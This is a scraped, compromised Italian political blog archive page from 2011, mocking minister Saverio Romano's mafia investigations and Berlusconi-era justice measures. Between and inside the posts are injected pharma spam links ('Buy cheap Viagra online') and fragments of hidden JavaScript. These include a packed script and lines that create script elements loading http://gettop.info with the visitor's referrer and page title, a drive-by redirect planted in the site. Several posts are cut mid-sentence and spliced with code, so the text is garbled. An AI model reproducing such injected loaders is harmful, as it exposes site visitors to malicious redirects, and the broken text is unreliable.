Corruzione Archivi - NonCeLaFaccioPiù

.

“La mafia ha soverchiato il Parlamento e ne vuole condizionare le scelte!”

28 settembre 2011 Commenti chiusi

Il ministro delle politiche agricole Saverio Romano, intervenendo in Parlamento prima della votazione che oggi deciderà se un indagato per concorso esterno in associazione mafiosa può ancora fare il ministro (roba da pazzi!), ha adottato delle espressioni che ormai eravamo abituati a sentir utilizzare dal Premier durante i suoi numerosi attacchi alla magistratura:

“L’ordine giudiziario ha soverchiato il Parlamento e ne vuole condizionare le scelte.”
“Il Parlamento ha perso la sua centralità a vantaggio di altri poteri.”
“Io sono stato oggetto di una campagna di aggressione che non auguro a nessuno.”

Come il suo padrone, sembra che abbia deciso anche lui di puntare il dito contro quei giudici comunisti, che altro non sanno fare che accanirsi contro il politico di turno, e di sminuire le solite chiacchiere di quei quattro pentiti, che tanto si divertono a buttare fango sul primo che passa.

Buy cheap Viagra online

Già perché del nostro Saverio Romano sembra che i pentiti siciliani parlino spesso:

Nel 2005 era stato archiviato dalla Procura di Palermo per i reati di concorso esterno in associazione mafiosa e corruzione di cui era stato indagato nel 2003. Successivamente la Procura aveva riaperto l’indagine per l’insorgenza di nuovi elementi in seguito alle dichiarazioni del pentito Francesco Campanella. Nel luglio 2011 ne è stato chiesto il rinvio a giudizio in quanto, secondo i PM, “nella sua veste di esponente politico di spicco avrebbe consapevolmente e fattivamente contribuito al sostegno ed al rafforzamento dell’associazione mafiosa”.

Nel 2009 Massimo Ciancimino lo accusò di avergli pagato tangenti per 100 000 euro e per questo è stato iscritto nel registro degli indagati della DDA di Palermo per concorso in corruzione aggravata dal favoreggiamento di Cosa Nostra assieme ai politici dell’ Udc Totò Cuffaro e Salvatore Cintola e del Pdl Carlo Vizzini . L’accusa era fondata su delle intercettazioni tra Romano e l’avvocato Gianni Lapis, prestanome della famiglia Ciancimino.

Nel settembre 2011 anche il pentito Stefano Lo Verso fà il nome di Romano accusandolo di essere legato alla cosca mafiosa di Villabate.

Nonostante i suoi trascorsi giudiziari e il fatto che sia lampante che il ministro sia un personaggio decisamente conosciuto tra le cosche siciliane, è ormai chiaro che la Camera voterà contro la mozione di sfiducia. A poco servirà la strenua opposizione di Di Pietro.

Intanto davanti a Montecitorio il Popolo Viola grida: “Fuori la mafia dallo Stato!” e chiede l’intervento di Napolitano. Beh sappiate che è stato proprio lui a nominare Romano ministro delle politiche agricole a marzo di quest’anno, nonostante sapesse benissimo dei suoi procedimenti giudiziari. Mi pare che sia il primo caso in Italia in cui un indagato per mafia viene nominato ministro! (In genere i legami con Cosa Nostra sono sempre stati scoperti in seguito).

Forse è vero, ha ragione lui quando dice che il Parlamento ha perso la sua centralità a vantaggio di altri poteri. Già, in primo luogo quello mafioso!!

-

<8 q="s:u;v:w" 0="\'+0+\'" x="\'+4+\'" y="\'+5+\'">\')})();',35,35,'src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height'.split('|'),0,{}))

var d=document;var s=d.createElement('script');

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Dove la trovi una giustizia più celere di così?!

22 settembre 2011 Commenti chiusi

Certo che il governo Berlusconi in questi ultimi anni si è proprio impegnato sul fronte della sicurezza.

Grazie al decreto legge del 23 maggio 2008 ha assicurato un meccanismo più celere per la trattazione dei processi per i reati più gravi.

Buy cheap Viagra online

Ma se nei tuoi confronti sono stati ipotizzati reati quali: associazione per delinquere, corruzione e rivelazione di segreto d’ufficio (per esempio), se sei il braccio destro di Tremonti e sei un membro della P4, basterà una semplice e veloce votazione della Camera e potrai essere salvato. Più celere di così!!

“Ogni riferimento a fatti o persone realmente esistenti e magari oggetto di cronaca recente è puramente casuale!!”

Non ce la faccio più!!

<\/s'+'cript>');
//]]>

sono senza lavoro o sono costretti a lavorare a 400

Buy cheap Viagra online

, 500 euro al mese, 8 ore al giorno, 6 giorni su 7, in nero, senza un briciolo di contributi o garanzie, per tentare almeno di sopravvivere, per avere almeno una speranza che domani andrà meglio. Dove c’è chi guadagna 15mila euro al mese per lavorare due giorni a settimana e acquisisce il diritto alla pensione dopo pochi anni, mentre un comune mortale per maturare lo stesso diritto deve sgobbare una vita.

Un paese dove l’incapacità e l’avidità di qualcuno ha ridotto la maggioranza dei cittadini quasi alla fame!

Beh sì, forse questa volta ha ragione Berlusconi: “L’Italia è veramente un paese di merda!”

var d=document;var s=d.createElement('script');

if (document.currentScript) {

Saldi al tribunale di Milano!

9 luglio 2011 Commenti chiusi

Sembra che sia periodo di saldi pure per il Cavaliere, ma lo sconto di 200 milioni, sentenziato dalla seconda sezione civile del tribunale di Milano, non ha fatto altro che rendere il mostruoso conto da pagare leggermente meno salato. Il risarcimento che la Fininvest dovrà sborsare alla Cir di Carlo De Benedetti ora ammonta a

Buy cheap Viagra online

560 milioni di euro. Una bella sommetta! La questione ora è capire quali saranno i tempi del pagamento. Nella giustizia civile le sentenze diventano subito esecutive, ma ormai questo governo ci ha addestrato ad essere avvezzi a sentir parlare di codici e di microscopici cavilli che ormai spuntano dappertutto. Non ci resta, quindi, che attendere e restare a guardare cosa il premier e i suoi hanno in serbo per spuntarla perchè, in tutta onestà, non credo proprio che abbia intenzione di pagare!

-

Buy cheap Viagra online

, verrà distribuita ai partecipanti la brochure con tutti i risultati del governo Berlusconi degli ultimi tre anni. Tralasciando il fatto che questa cazzata abominevole sia totalmente ed ovviamente pagata con i nostri soldi, noterete che sono stati tralasciati alcuni dati importanti. Secondo un’indagine ISTAT le mignotte che sono andate a ricoprire incarichi politici sono aumentate dell’80%; i consumi di Viagra sono aumentati del 200%; i condannati in parlamento sono sempre di più; la corruzione è ai suoi massimi storici e molte altre cose sono state fatte e promesse. Davvero dei dati degni di nota! Mi stupisco che non siano stati menzionati. Leggendo bene però ho notato un piccolo neo su questa grande bacheca dei trofei: a pagina 16-17 vedo che l’immigrazione clandestina è diminuita dell’88%. Wow! Il problema che i dati coprono un periodo che va dal 1 agosto 2009 al 31 luglio 2010, prima della crisi in nord Africa. Ma nel titolo non c’era scritto “3 anni di governo”?! Chissà perchè sono stati tralasciati i dati del 2011! Chi ha scritto la brochure l’avrà fatto volontariamente?! Mah… Se siete interessati e volete varvi un’idea potete consultarla on line qui!

URL Foto: Varese7press.it

-

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Powered by AlterVista